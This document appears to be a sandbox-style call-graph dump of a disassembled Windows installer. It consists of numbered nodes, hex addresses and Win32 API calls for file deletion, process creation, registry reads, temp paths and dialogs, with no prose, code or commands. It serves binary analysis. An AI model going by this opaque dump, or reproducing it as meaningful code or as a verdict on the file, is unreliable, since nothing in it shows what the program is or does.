4727 1000272b 4728 1000277b 4727->4728 4729 1000273b VirtualProtect 4727->4729 4729->4728 5109 40286f SendMessageA 5110 402894 5109->5110 5111 402889 InvalidateRect 5109->5111 5111->5110 5119 4014f0 SetForegroundWindow 5120 402894 5119->5120 5121 401af0 5122 4029ff 18 API calls 5121->5122 5123 401af7 5122->5123 5124 4029e2 18 API calls 5123->5124 5125 401b00 wsprintfA 5124->5125 5126 402894 5125->5126 4744 4019f1 4745 4029ff 18 API calls 4744->4745 4746 4019fa ExpandEnvironmentStringsA 4745->4746 4747 401a0e 4746->4747 4749 401a21 4746->4749 4748 401a13 lstrcmpA 4747->4748 4747->4749 4748->4749 5141 10001637 5142 10001666 5141->5142 5143 10001a86 20 API calls 5142->5143 5144 1000166d 5143->5144 5145 10001680 5144->5145 5146 10001674 5144->5146 5148 100016a7 5145->5148 5149 1000168a 5145->5149 5147 10001278 2 API calls 5146->5147 5158 1000167e 5147->5158 5150 100016d1 5148->5150 5151 100016ad 5148->5151 5152 100014ff 3 API calls 5149->5152 5154 100014ff 3 API calls 5150->5154 5153 10001576 3 API calls 5151->5153 5155 1000168f 5152->5155 5157 100016b2 5153->5157 5154->5158 5156 10001576 3 API calls 5155->5156 5159 10001695 5156->5159 5160 10001278 2 API calls 5157->5160 5161 10001278 2 API calls 5159->5161 5162 100016b8 GlobalFree 5160->5162 5163 1000169b GlobalFree 5161->5163 5162->5158 5164 100016cc GlobalFree 5162->5164 5163->5158 5164->5158 5165 401c78 5166 4029e2 18 API calls 5165->5166 5167 401c7e IsWindow 5166->5167 5168 4019e1 5167->5168 5169 403afb 5170 403b13 5169->5170 5171 403c4e 5169->5171 5170->5171 5172 403b1f 5170->5172 5173 403c9f 5171->5173 5174 403c5f GetDlgItem GetDlgItem 5171->5174 5175 403b2a SetWindowPos 5172->5175 5176 403b3d 5172->5176 5178 403cf9 5173->5178 5187 401389 2 API calls 5173->5187 5177 403fce 19 API calls 5174->5177 5175->5176 5180 403b42 ShowWindow 5176->5180 5181 403b5a 5176->5181 5182 403c89 SetClassLongA 5177->5182 5179 40401a SendMessageA 5178->5179 5183 403c49 5178->5183 5209 403d0b 5179->5209 5180->5181 5184 403b62 DestroyWindow 5181->5184 5185 403b7c 5181->5185 5186 40140b 2 API calls 5182->5186 5188 403f57 5184->5188 5189 403b81 SetWindowLongA 5185->5189 5190 403b92 5185->5190 5186->5173 5191 403cd1 5187->5191 5188->5183 5198 403f88 ShowWindow 5188->5198 5189->5183 5194 403c09 5190->5194 5195 403b9e GetDlgItem 5190->5195 5191->5178 5196 403cd5 SendMessageA 5191->5196 5192 40140b 2 API calls 5192->5209 5193 403f59 DestroyWindow EndDialog 5193->5188 5197 404035 8 API calls 5194->5197 5199 403bb1 SendMessageA IsWindowEnabled 5195->5199 5200 403bce 5195->5200 5196->5183 5197->5183 5198->5183 5199->5183 5199->5200 5202 403bdb 5200->5202 5203 403c22 SendMessageA 5200->5203 5204 403bee 5200->5204 5212 403bd3 5200->5212 5201 405d02 18 API calls 5201->5209 5202->5203 5202->5212 5203->5194 5207 403bf6 5204->5207 5208 403c0b 5204->5208 5206 403fce 19 API calls 5206->5209 5210 40140b 2 API calls 5207->5210 5211 40140b 2 API calls 5208->5211 5209->5183 5209->5192 5209->5193 5209->5201 5209->5206 5213 403fce 19 API calls 5209->5213 5228 403e99 DestroyWindow 5209->5228 5210->5212 5211->5212 5212->5194 5237 403fa7 5212->5237 5214 403d86 GetDlgItem 5213->5214 5215 403da3 ShowWindow EnableWindow 5214->5215 5216 403d9b 5214->5216 5240 403ff0 EnableWindow 5215->5240 5216->5215 5218 403dcd EnableWindow 5221 403de1 5218->5221 5219 403de6 GetSystemMenu EnableMenuItem SendMessageA 5220 403e16 SendMessageA 5219->5220 5219->5221 5220->5221 5221->5219 5241 404003 SendMessageA 5221->5241 5242 405ce0 lstrcpynA 5221->5242 5224 403e44 lstrlenA 5225 405d02 18 API calls 5224->5225 5226 403e55 SetWindowTextA 5225->5226 5227 401389 2 API calls 5226->5227 5227->5209 5228->5188 5229 403eb3 CreateDialogParamA 5228->5229 5229->5188 5230 403ee6 5229->5230 5231 403fce 19 API calls 5230->5231 5232 403ef1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5231->5232 5233 401389 2 API calls 5232->5233 5234 403f37 5233->5234 5234->5183 5235 403f3f ShowWindow 5234->5235 5236 40401a SendMessageA 5235->5236 5236->5188 5238 403fb4 SendMessageA 5237->5238 5239 403fae 5237->5239 5238->5194 5239->5238 5240->5218 5241->5221 5242->5224 5243 1000103d 5244 1000101b 8 API calls 5243->5244 5245 10001056 5244->5245 5246 4014fe 5247 401506 5246->5247 5249 401519 5246->5249 5248 4029e2 18 API calls 5247->5248 5248->5249 5250 401000 5251 401037 BeginPaint GetClientRect 5250->5251 5252 40100c DefWindowProcA 5250->5252 5254 4010f3 5251->5254 5255 401179 5252->5255 5256 401073 CreateBrushIndirect FillRect DeleteObject 5254->5256 5257 4010fc 5254->5257 5256->5254 5258 401102 CreateFontIndirectA 5257->5258 5259 401167 EndPaint 5257->5259 5258->5259 5260 401112 6 API calls 5258->5260 5259->5255 5260->5259 3886 402281 3893 4029ff 3886->3893 3889 4029ff 18 API calls 3890 40229b 3889->3890 3891 4029ff 18 API calls 3890->3891 3892 4022a5 GetPrivateProfileStringA 3891->3892 3894 402a0b 3893->3894 3899 405d02 3894->3899 3897 402292 3897->3889 3915 405d0f 3899->3915 3900 405f32 3901 402a2c 3900->3901 3933 405ce0 lstrcpynA 3900->3933 3901->3897 3917 405f4b 3901->3917 3903 405db0 GetVersion 3903->3915 3904 405f09 lstrlenA 3904->3915 3905 405d02 10 API calls 3905->3904 3909 405e28 GetSystemDirectoryA 3909->3915 3910 405e3b GetWindowsDirectoryA 3910->3915 3911 405f4b 5 API calls 3911->3915 3912 405d02 10 API calls 3912->3915 3913 405eb2 lstrcatA 3913->3915 3914 405e6f SHGetSpecialFolderLocation 3914->3915 3916 405e87 SHGetPathFromIDListA CoTaskMemFree 3914->3916 3915->3900 3915->3903 3915->3904 3915->3905 3915->3909 3915->3910 3915->3911 3915->3912 3915->3913 3915->3914 3926 405bc7 RegOpenKeyExA 3915->3926 3931 405c3e wsprintfA 3915->3931 3932 405ce0 lstrcpynA 3915->3932 3916->3915 3923 405f57 3917->3923 3918 405fbf 3919 405fc3 CharPrevA 3918->3919 3921 405fde 3918->3921 3919->3918 3920 405fb4 CharNextA 3920->3918 3920->3923 3921->3897 3923->3918 3923->3920 3924 405fa2 CharNextA 3923->3924 3925 405faf CharNextA 3923->3925 3934 40579b 3923->3934 3924->3923 3925->3920 3927 405c38 3926->3927 3928 405bfa RegQueryValueExA 3926->3928 3927->3915 3929 405c1b RegCloseKey 3928->3929 3929->3927 3931->3915 3932->3915 3933->3901 3935 4057a1 3934->3935 3936 4057b4 3935->3936 3937 4057a7 CharNextA 3935->3937 3936->3923 3937->3935 5261 402604 5262 402894 5261->5262 5263 40260b 5261->5263 5264 402611 FindClose 5263->5264 5264->5262 5265 402685 5266 4029ff 18 API calls 5265->5266 5267 402693 5266->5267 5268 4026a9 5267->5268 5269 4029ff 18 API calls 5267->5269 5270 40594c 2 API calls 5268->5270 5269->5268 5271 4026af 5270->5271 5291 405971 GetFileAttributesA CreateFileA 5271->5291 5273 4026bc 5274 402765 5273->5274 5275 4026c8 GlobalAlloc 5273->5275 5278 402780 5274->5278 5279 40276d DeleteFileA 5274->5279 5276 4026e1 5275->5276 5277 40275c CloseHandle 5275->5277 5292 4031ce SetFilePointer 5276->5292 5277->5274 5279->5278 5281 4026e7 5282 4031b8 ReadFile 5281->5282 5283 4026f0 GlobalAlloc 5282->5283 5284 402700 5283->5284 5285 402734 WriteFile GlobalFree 5283->5285 5287 402f21 46 API calls 5284->5287 5286 402f21 46 API calls 5285->5286 5288 402759 5286->5288 5290 40270d 5287->5290 5288->5277 5289 40272b GlobalFree 5289->5285 5290->5289 5291->5273 5292->5281 5293 401705 5294 4029ff 18 API calls 5293->5294 5295 40170c SearchPathA 5294->5295 5296 4027bf 5295->5296 5297 401727 5295->5297 5297->5296 5299 405ce0 lstrcpynA 5297->5299 5299->5296 5300 406606 5304 40613e 5300->5304 5301 406aa9 5302 4061c8 GlobalAlloc 5302->5301 5302->5304 5303 4061bf GlobalFree 5303->5302 5304->5301 5304->5302 5304->5303 5304->5304 5305 406236 GlobalFree 5304->5305 5306 40623f GlobalAlloc 5304->5306 5305->5306 5306->5301 5306->5304 3979 401389 3981 401390 3979->3981 3980 4013fe 3981->3980 3982 4013cb MulDiv SendMessageA 3981->3982 3982->3981 5307 405109 5308 4052b6 5307->5308 5309 40512b GetDlgItem GetDlgItem GetDlgItem 5307->5309 5311 4052e6 5308->5311 5312 4052be GetDlgItem CreateThread CloseHandle 5308->5312 5352 404003 SendMessageA 5309->5352 5313 405314 5311->5313 5315 405335 5311->5315 5316 4052fc ShowWindow ShowWindow 5311->5316 5312->5311 5317 405324 5313->5317 5318 405348 ShowWindow 5313->5318 5321 40536f 5313->5321 5314 40519c 5320 4051a3 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5314->5320 5319 404035 8 API calls 5315->5319 5354 404003 SendMessageA 5316->5354 5323 403fa7 SendMessageA 5317->5323 5325 405368 5318->5325 5326 40535a 5318->5326 5324 405341 5319->5324 5327 405212 5320->5327 5328 4051f6 SendMessageA SendMessageA 5320->5328 5321->5315 5329 40537c SendMessageA 5321->5329 5323->5315 5331 403fa7 SendMessageA 5325->5331 5330 404fcb 25 API calls 5326->5330 5332 405225 5327->5332 5333 405217 SendMessageA 5327->5333 5328->5327 5329->5324 5334 405395 CreatePopupMenu 5329->5334 5330->5325 5331->5321 5336 403fce 19 API calls 5332->5336 5333->5332 5335 405d02 18 API calls 5334->5335 5337 4053a5 AppendMenuA 5335->5337 5338 405235 5336->5338 5339 4053c3 GetWindowRect 5337->5339 5340 4053d6 TrackPopupMenu 5337->5340 5341 405272 GetDlgItem SendMessageA 5338->5341 5342 40523e ShowWindow 5338->5342 5339->5340 5340->5324 5343 4053f2 5340->5343 5341->5324 5345 405299 SendMessageA SendMessageA 5341->5345 5344 405254 ShowWindow 5342->5344 5347 405261 5342->5347 5346 405411 SendMessageA 5343->5346 5344->5347 5345->5324 5346->5346 5348 40542e OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5346->5348 5353 404003 SendMessageA 5347->5353 5350 405450 SendMessageA 5348->5350 5350->5350 5351 405472 GlobalUnlock SetClipboardData CloseClipboard 5350->5351 5351->5324 5352->5314 5353->5341 5354->5313 5355 40440c 5356 404438 5355->5356 5357 404449 5355->5357 5416 4054d8 GetDlgItemTextA 5356->5416 5359 404455 GetDlgItem 5357->5359 5366 4044b4 5357->5366 5361 404469 5359->5361 5360 404443 5363 405f4b 5 API calls 5360->5363 5364 40447d SetWindowTextA 5361->5364 5372 405809 4 API calls 5361->5372 5362 404598 5365 404733 5362->5365 5418 4054d8 GetDlgItemTextA 5362->5418 5363->5357 5368 403fce 19 API calls 5364->5368 5371 404035 8 API calls 5365->5371 5366->5362 5366->5365 5369 405d02 18 API calls 5366->5369 5373 404499 5368->5373 5374 404528 SHBrowseForFolderA 5369->5374 5370 4045c8 5375 40585e 18 API calls 5370->5375 5376 404747 5371->5376 5377 404473 5372->5377 5378 403fce 19 API calls 5373->5378 5374->5362 5379 404540 CoTaskMemFree 5374->5379 5380 4045ce 5375->5380 5377->5364 5383 405770 3 API calls 5377->5383 5381 4044a7 5378->5381 5382 405770 3 API calls 5379->5382 5419 405ce0 lstrcpynA 5380->5419 5417 404003 SendMessageA 5381->5417 5385 40454d 5382->5385 5383->5364 5388 404584 SetDlgItemTextA 5385->5388 5392 405d02 18 API calls 5385->5392 5387 4044ad 5390 40600b 3 API calls 5387->5390 5388->5362 5389 4045e5 5391 40600b 3 API calls 5389->5391 5390->5366 5399 4045ed 5391->5399 5393 40456c lstrcmpiA 5392->5393 5393->5388 5396 40457d lstrcatA 5393->5396 5394 404627 5420 405ce0 lstrcpynA 5394->5420 5396->5388 5397 40462e 5398 405809 4 API calls 5397->5398 5400 404634 GetDiskFreeSpaceA 5398->5400 5399->5394 5402 4057b7 2 API calls 5399->5402 5404 404678 5399->5404 5403 404656 MulDiv 5400->5403 5400->5404 5402->5399 5403->5404 5405 4046e2 5404->5405 5406 4047b4 21 API calls 5404->5406 5407 404705 5405->5407 5409 40140b 2 API calls 5405->5409 5408 4046d4 5406->5408 5421 403ff0 EnableWindow 5407->5421 5411 4046e4 SetDlgItemTextA 5408->5411 5412 4046d9 5408->5412 5409->5407 5411->5405 5414 4047b4 21 API calls 5412->5414 5413 404721 5413->5365 5422 4043a1 5413->5422 5414->5405 5416->5360 5417->5387 5418->5370 5419->5389 5420->5397 5421->5413 5423 4043b4 SendMessageA 5422->5423 5424 4043af 5422->5424 5423->5365 5424->5423 5425 40280c 5426 4029e2 18 API calls 5425->5426 5427 402812 5426->5427 5428 402665 5427->5428 5429 402843 5427->5429 5431 402820 5427->5431 5429->5428 5430 405d02 18 API calls 5429->5430 5430->5428 5431->5428 5433 405c3e wsprintfA 5431->5433 5433->5428 5434 40218c 5435 4029ff 18 API calls 5434->5435 5436 402192 5435->5436 5437 4029ff 18 API calls 5436->5437 5438 40219b 5437->5438 5439 4029ff 18 API calls 5438->5439 5440 4021a4 5439->5440 5441 405fe4 2 API calls 5440->5441 5442 4021ad 5441->5442 5443 4021be lstrlenA lstrlenA 5442->5443 5448 4021b1 5442->5448 5445 404fcb 25 API calls 5443->5445 5444 404fcb 25 API calls 5447 4021b9 5444->5447 5446 4021fa SHFileOperationA 5445->5446 5446->5447 5446->5448 5448->5444 5448->5447 5449 40220e 5450 402215 5449->5450 5453 402228 5449->5453 5451 405d02 18 API calls 5450->5451 5452 402222 5451->5452 5454 4054f4 MessageBoxIndirectA 5452->5454 5454->5453 5455 401490 5456 404fcb 25 API calls 5455->5456 5457 401497 5456->5457 5458 100015d0 5459 100014d8 4 API calls 5458->5459 5461 100015e8 5459->5461 5460 1000162e GlobalFree 5461->5460 5462 10001603 5461->5462 5463 1000161a VirtualFree 5461->5463 5462->5460 5463->5460 4065 401b11 4066 401b62 4065->4066 4071 401b1e 4065->4071 4067 401b8b GlobalAlloc 4066->4067 4069 401b66 4066->4069 4070 405d02 18 API calls 4067->4070 4068 405d02 18 API calls 4072 402222 4068->4072 4079 402228 4069->4079 4086 405ce0 lstrcpynA 4069->4086 4074 401ba6 4070->4074 4071->4074 4075 401b35 4071->4075 4087 4054f4 4072->4087 4074->4068 4074->4079 4084 405ce0 lstrcpynA 4075->4084 4076 401b78 GlobalFree 4076->4079 4080 401b44 4085 405ce0 lstrcpynA 4080->4085 4082 401b53 4091 405ce0 lstrcpynA 4082->4091 4084->4080 4085->4082 4086->4076 4088 405509 4087->4088 4089 405555 4088->4089 4090 40551d MessageBoxIndirectA 4088->4090 4089->4079 4090->4089 4091->4079 4104 401595 4105 4029ff 18 API calls 4104->4105 4106 40159c SetFileAttributesA 4105->4106 4107 4015ae 4106->4107 5464 401c95 5465 4029e2 18 API calls 5464->5465 5466 401c9c 5465->5466 5467 4029e2 18 API calls 5466->5467 5468 401ca4 GetDlgItem 5467->5468 5469 4024cd 5468->5469 5470 404117 5471 40412d 5470->5471 5476 404239 5470->5476 5474 403fce 19 API calls 5471->5474 5472 4042a8 5473 40437c 5472->5473 5475 4042b2 GetDlgItem 5472->5475 5481 404035 8 API calls 5473->5481 5477 404183 5474->5477 5478 4042c8 5475->5478 5479 40433a 5475->5479 5476->5472 5476->5473 5480 40427d GetDlgItem SendMessageA 5476->5480 5482 403fce 19 API calls 5477->5482 5478->5479 5483 4042ee 6 API calls 5478->5483 5479->5473 5484 40434c 5479->5484 5501 403ff0 EnableWindow 5480->5501 5492 404377 5481->5492 5486 404190 CheckDlgButton 5482->5486 5483->5479 5487 404352 SendMessageA 5484->5487 5488 404363 5484->5488 5499 403ff0 EnableWindow 5486->5499 5487->5488 5488->5492 5493 404369 SendMessageA 5488->5493 5489 4042a3 5494 4043a1 SendMessageA 5489->5494 5491 4041ae GetDlgItem 5500 404003 SendMessageA 5491->5500 5493->5492 5494->5472 5496 4041c4 SendMessageA 5497 4041e2 GetSysColor 5496->5497 5498 4041eb SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5496->5498 5497->5498 5498->5492 5499->5491 5500->5496 5501->5489 4125 401918 4126 40191a 4125->4126 4127 4029ff 18 API calls 4126->4127 4128 40191f 4127->4128 4131 4055a0 4128->4131 4171 40585e 4131->4171 4134 4055c8 DeleteFileA 4140 401928 4134->4140 4135 4055df 4149 40570d 4135->4149 4185 405ce0 lstrcpynA 4135->4185 4137 405605 4138 405618 4137->4138 4139 40560b lstrcatA 4137->4139 4186 4057b7 lstrlenA 4138->4186 4141 40561e 4139->4141 4145 40562c lstrcatA 4141->4145 4147 405637 lstrlenA FindFirstFileA 4141->4147 4143 405fe4 2 API calls 4144 405731 4143->4144 4144->4140 4146 405735 4144->4146 4145->4147 4199 405770 lstrlenA CharPrevA 4146->4199 4147->4149 4154 40565b 4147->4154 4149->4140 4149->4143 4151 40579b CharNextA 4151->4154 4152 405558 5 API calls 4153 405747 4152->4153 4155 405761 4153->4155 4156 40574b 4153->4156 4154->4151 4157 4056ec FindNextFileA 4154->4157 4168 4056ad 4154->4168 4190 405ce0 lstrcpynA 4154->4190 4159 404fcb 25 API calls 4155->4159 4156->4140 4161 404fcb 25 API calls 4156->4161 4157->4154 4160 405704 FindClose 4157->4160 4159->4140 4160->4149 4162 405758 4161->4162 4163 405b94 40 API calls 4162->4163 4166 40575f 4163->4166 4165 4055a0 64 API calls 4165->4168 4166->4140 4167 404fcb 25 API calls 4167->4157 4168->4157 4168->4165 4168->4167 4169 404fcb 25 API calls 4168->4169 4170 405b94 40 API calls 4168->4170 4191 405558 4168->4191 4169->4168 4170->4168 4202 405ce0 lstrcpynA 4171->4202 4173 40586f 4203 405809 CharNextA CharNextA 4173->4203 4176 4055c0 4176->4134 4176->4135 4177 405f4b 5 API calls 4183 405885 4177->4183 4178 4058b0 lstrlenA 4179 4058bb 4178->4179 4178->4183 4181 405770 3 API calls 4179->4181 4180 405fe4 2 API calls 4180->4183 4182 4058c0 GetFileAttributesA 4181->4182 4182->4176 4183->4176 4183->4178 4183->4180 4184 4057b7 2 API calls 4183->4184 4184->4178 4185->4137 4187 4057c4 4186->4187 4188 4057d5 4187->4188 4189 4057c9 CharPrevA 4187->4189 4188->4141 4189->4187 4189->4188 4190->4154 4209 40594c GetFileAttributesA 4191->4209 4194 405585 4194->4168 4195 405573 RemoveDirectoryA 4197 405581 4195->4197 4196 40557b DeleteFileA 4196->4197 4197->4194 4198 405591 SetFileAttributesA 4197->4198 4198->4194 4200 40573b 4199->4200 4201 40578a lstrcatA 4199->4201 4200->4152 4201->4200 4202->4173 4204 405824 4203->4204 4207 405834 4203->4207 4206 40582f CharNextA 4204->4206 4204->4207 4205 405854 4205->4176 4205->4177 4206->4205 4207->4205 4208 40579b CharNextA 4207->4208 4208->4207 4210 405564 4209->4210 4211 40595e SetFileAttributesA 4209->4211 4210->4194 4210->4195 4210->4196 4211->4210 5502 10001058 5503 1000123b 3 API calls 5502->5503 5505 10001074 5503->5505 5504 100010dc 5505->5504 5506 10001091 5505->5506 5507 100014d8 4 API calls 5505->5507 5508 100014d8 4 API calls 5506->5508 5507->5506 5509 100010a1 5508->5509 5510 100010b1 5509->5510 5511 100010a8 GlobalSize 5509->5511 5512 100010b5 GlobalAlloc 5510->5512 5513 100010c6 5510->5513 5511->5510 5514 100014ff 3 API calls 5512->5514 5515 100010d1 GlobalFree 5513->5515 5514->5513 5515->5504 4212 403219 #17 SetErrorMode OleInitialize 4213 40600b 3 API calls 4212->4213 4214 40325e SHGetFileInfoA 4213->4214 4285 405ce0 lstrcpynA 4214->4285 4216 403289 GetCommandLineA 4286 405ce0 lstrcpynA 4216->4286 4218 40329b GetModuleHandleA 4219 4032b2 4218->4219 4220 40579b CharNextA 4219->4220 4221 4032c6 CharNextA 4220->4221 4229 4032d6 4221->4229 4222 4033a0 4223 4033b3 GetTempPathA 4222->4223 4287 4031e5 4223->4287 4225 4033cb 4226 403425 DeleteFileA 4225->4226 4227 4033cf GetWindowsDirectoryA lstrcatA 4225->4227 4295 402c7b GetTickCount GetModuleFileNameA 4226->4295 4230 4031e5 11 API calls 4227->4230 4228 40579b CharNextA 4228->4229 4229->4222 4229->4228 4233 4033a2 4229->4233 4232 4033eb 4230->4232 4232->4226 4235 4033ef GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4232->4235 4380 405ce0 lstrcpynA 4233->4380 4239 4031e5 11 API calls 4235->4239 4236 4034cf 4383 403677 4236->4383 4237 403439 4237->4236 4240 4034bf 4237->4240 4244 40579b CharNextA 4237->4244 4242 40341d 4239->4242 4325 403769 4240->4325 4242->4226 4242->4236 4245 403454 4244->4245 4251 40349a 4245->4251 4252 4034fe lstrcatA lstrcmpiA 4245->4252 4246 4034e8 4248 4054f4 MessageBoxIndirectA 4246->4248 4247 4035dc 4249 40365f ExitProcess 4247->4249 4254 40600b 3 API calls 4247->4254 4253 4034f6 ExitProcess 4248->4253 4256 40585e 18 API calls 4251->4256 4252->4236 4257 40351a CreateDirectoryA SetCurrentDirectoryA 4252->4257 4255 4035eb 4254->4255 4258 40600b 3 API calls 4255->4258 4259 4034a5 4256->4259 4260 403531 4257->4260 4261 40353c 4257->4261 4262 4035f4 4258->4262 4259->4236 4381 405ce0 lstrcpynA 4259->4381 4392 405ce0 lstrcpynA 4260->4392 4393 405ce0 lstrcpynA 4261->4393 4265 40600b 3 API calls 4262->4265 4267 4035fd 4265->4267 4269 40364b ExitWindowsEx 4267->4269 4276 40360b GetCurrentProcess 4267->4276 4268 4034b4 4382 405ce0 lstrcpynA 4268->4382 4269->4249 4272 403658 4269->4272 4271 405d02 18 API calls 4273 40357b DeleteFileA 4271->4273 4397 40140b 4272->4397 4275 403588 CopyFileA 4273->4275 4282 40354a 4273->4282 4275->4282 4279 40361b 4276->4279 4277 4035d0 4280 405b94 40 API calls 4277->4280 4278 405b94 40 API calls 4278->4282 4279->4269 4280->4236 4281 405d02 18 API calls 4281->4282 4282->4271 4282->4277 4282->4278 4282->4281 4284 4035bc CloseHandle 4282->4284 4394 405493 CreateProcessA 4282->4394 4284->4282 4285->4216 4286->4218 4288 405f4b 5 API calls 4287->4288 4289 4031f1 4288->4289 4290 4031fb 4289->4290 4291 405770 3 API calls 4289->4291 4290->4225 4292 403203 CreateDirectoryA 4291->4292 4400 4059a0 4292->4400 4404 405971 GetFileAttributesA CreateFileA 4295->4404 4297 402cbe 4324 402ccb 4297->4324 4405 405ce0 lstrcpynA 4297->4405 4299 402ce1 4300 4057b7 2 API calls 4299->4300 4301 402ce7 4300->4301 4406 405ce0 lstrcpynA 4301->4406 4303 402cf2 GetFileSize 4304 402df3 4303->4304 4305 402d09 4303->4305 4407 402bdc 4304->4407 4305->4304 4309 402e8e 4305->4309 4316 402bdc 33 API calls 4305->4316 4305->4324 4438 4031b8 4305->4438 4312 402bdc 33 API calls 4309->4312 4310 402e36 GlobalAlloc 4311 402e4d 4310->4311 4317 4059a0 2 API calls 4311->4317 4312->4324 4314 402e17 4315 4031b8 ReadFile 4314->4315 4318 402e22 4315->4318 4316->4305 4319 402e5e CreateFileA 4317->4319 4318->4310 4318->4324 4320 402e98 4319->4320 4319->4324 4422 4031ce SetFilePointer 4320->4422 4322 402ea6 4423 402f21 4322->4423 4324->4237 4324->4324 4326 40600b 3 API calls 4325->4326 4327 40377d 4326->4327 4328 403783 4327->4328 4329 403795 4327->4329 4479 405c3e wsprintfA 4328->4479 4330 405bc7 3 API calls 4329->4330 4331 4037c0 4330->4331 4332 4037de lstrcatA 4331->4332 4334 405bc7 3 API calls 4331->4334 4335 403793 4332->4335 4334->4332 4470 403a2e 4335->4470 4338 40585e 18 API calls 4339 403810 4338->4339 4340 403899 4339->4340 4342 405bc7 3 API calls 4339->4342 4341 40585e 18 API calls 4340->4341 4343 40389f 4341->4343 4351 40383c 4342->4351 4344 4038af LoadImageA 4343->4344 4347 405d02 18 API calls 4343->4347 4345 403955 4344->4345 4346 4038d6 RegisterClassA 4344->4346 4349 40140b 2 API calls 4345->4349 4348 40390c SystemParametersInfoA CreateWindowExA 4346->4348 4355 40395f 4346->4355 4347->4344 4348->4345 4354 40395b 4349->4354 4350 403858 lstrlenA 4352 403866 lstrcmpiA 4350->4352 4353 40388c 4350->4353 4351->4340 4351->4350 4356 40579b CharNextA 4351->4356 4352->4353 4358 403876 GetFileAttributesA 4352->4358 4359 405770 3 API calls 4353->4359 4354->4355 4361 403a2e 19 API calls 4354->4361 4355->4236 4357 403856 4356->4357 4357->4350 4360 403882 4358->4360 4362 403892 4359->4362 4360->4353 4363 4057b7 2 API calls 4360->4363 4364 40396c 4361->4364 4480 405ce0 lstrcpynA 4362->4480 4363->4353 4366 403978 ShowWindow LoadLibraryA 4364->4366 4367 4039fb 4364->4367 4369 403997 LoadLibraryA 4366->4369 4370 40399e GetClassInfoA 4366->4370 4481 40509d OleInitialize 4367->4481 4369->4370 4372 4039b2 GetClassInfoA RegisterClassA 4370->4372 4373 4039c8 DialogBoxParamA 4370->4373 4371 403a01 4374 403a05 4371->4374 4375 403a1d 4371->4375 4372->4373 4376 40140b 2 API calls 4373->4376 4374->4355 4379 40140b 2 API calls 4374->4379 4378 40140b 2 API calls 4375->4378 4377 4039f0 4376->4377 4377->4355 4378->4355 4379->4355 4380->4223 4381->4268 4382->4240 4384 403692 4383->4384 4385 403688 CloseHandle 4383->4385 4386 4036a6 4384->4386 4387 40369c CloseHandle 4384->4387 4385->4384 4496 4036d4 4386->4496 4387->4386 4390 4055a0 71 API calls 4391 4034d8 OleUninitialize 4390->4391 4391->4246 4391->4247 4392->4261 4393->4282 4395 4054c2 CloseHandle 4394->4395 4396 4054ce 4394->4396 4395->4396 4396->4282 4398 401389 2 API calls 4397->4398 4399 401420 4398->4399 4399->4249 4401 4059ab GetTickCount GetTempFileNameA 4400->4401 4402 4059d8 4401->4402 4403 403217 4401->4403 4402->4401 4402->4403 4403->4225 4404->4297 4405->4299 4406->4303 4408 402c02 4407->4408 4409 402bea 4407->4409 4412 402c12 GetTickCount 4408->4412 4413 402c0a 4408->4413 4410 402bf3 DestroyWindow 4409->4410 4411 402bfa 4409->4411 4410->4411 4411->4310 4411->4324 4441 4031ce SetFilePointer 4411->4441 4412->4411 4415 402c20 4412->4415 4442 406044 4413->4442 4416 402c55 CreateDialogParamA ShowWindow 4415->4416 4417 402c28 4415->4417 4416->4411 4417->4411 4446 402bc0 4417->4446 4419 402c36 wsprintfA 4420 404fcb 25 API calls 4419->4420 4421 402c53 4420->4421 4421->4411 4422->4322 4424 402f31 SetFilePointer 4423->4424 4425 402f4d 4423->4425 4424->4425 4449 40303c GetTickCount 4425->4449 4428 4059e9 ReadFile 4429 402f6d 4428->4429 4430 40303c 43 API calls 4429->4430 4434 402ff8 4429->4434 4431 402f84 4430->4431 4432 402ffe ReadFile 4431->4432 4431->4434 4435 402f94 4431->4435 4432->4434 4434->4324 4435->4434 4436 4059e9 ReadFile 4435->4436 4437 402fc7 WriteFile 4435->4437 4436->4435 4437->4434 4437->4435 4439 4059e9 ReadFile 4438->4439 4440 4031cb 4439->4440 4440->4305 4441->4314 4443 406061 PeekMessageA 4442->4443 4444 406071 4443->4444 4445 406057 DispatchMessageA 4443->4445 4444->4411 4445->4443 4447 402bd1 MulDiv 4446->4447 4448 402bcf 4446->4448 4447->4419 4448->4447 4450 4031a6 4449->4450 4451 40306b 4449->4451 4452 402bdc 33 API calls 4450->4452 4462 4031ce SetFilePointer 4451->4462 4458 402f54 4452->4458 4454 403076 SetFilePointer 4459 40309b 4454->4459 4455 4031b8 ReadFile 4455->4459 4457 402bdc 33 API calls 4457->4459 4458->4428 4458->4434 4459->4455 4459->4457 4459->4458 4460 403130 WriteFile 4459->4460 4461 403187 SetFilePointer 4459->4461 4463 40610b 4459->4463 4460->4458 4460->4459 4461->4450 4462->4454 4464 406130 4463->4464 4467 406138 4463->4467 4464->4459 4465 4061c8 GlobalAlloc 4465->4464 4465->4467 4466 4061bf GlobalFree 4466->4465 4467->4464 4467->4465 4467->4466 4468 406236 GlobalFree 4467->4468 4469 40623f GlobalAlloc 4467->4469 4468->4469 4469->4464 4469->4467 4471 403a42 4470->4471 4488 405c3e wsprintfA 4471->4488 4473 403ab3 4474 405d02 18 API calls 4473->4474 4475 403abf SetWindowTextA 4474->4475 4476 4037ee 4475->4476 4477 403adb 4475->4477 4476->4338 4477->4476 4478 405d02 18 API calls 4477->4478 4478->4477 4479->4335 4480->4340 4489 40401a 4481->4489 4483 4050e7 4485 40401a SendMessageA 4483->4485 4484 4050c0 4484->4483 4492 401389 4484->4492 4486 4050f9 OleUninitialize 4485->4486 4486->4371 4488->4473 4490 404032 4489->4490 4491 404023 SendMessageA 4489->4491 4490->4484 4491->4490 4494 401390 4492->4494 4493 4013fe 4493->4484 4494->4493 4495 4013cb MulDiv SendMessageA 4494->4495 4495->4494 4497 4036e2 4496->4497 4498 4036ab 4497->4498 4499 4036e7 FreeLibrary GlobalFree 4497->4499 4498->4390 4499->4498 4499->4499 4500 40251b 4501 4029e2 18 API calls 4500->4501 4506 402525 4501->4506 4502 40258f 4503 4059e9 ReadFile 4503->4506 4504 402591 4509 405c3e wsprintfA 4504->4509 4505 4025a1 4505->4502 4508 4025b7 SetFilePointer 4505->4508 4506->4502 4506->4503 4506->4504 4506->4505 4508->4502 4509->4502 4510 40231e 4511 402324 4510->4511 4512 4029ff 18 API calls 4511->4512 4513 402336 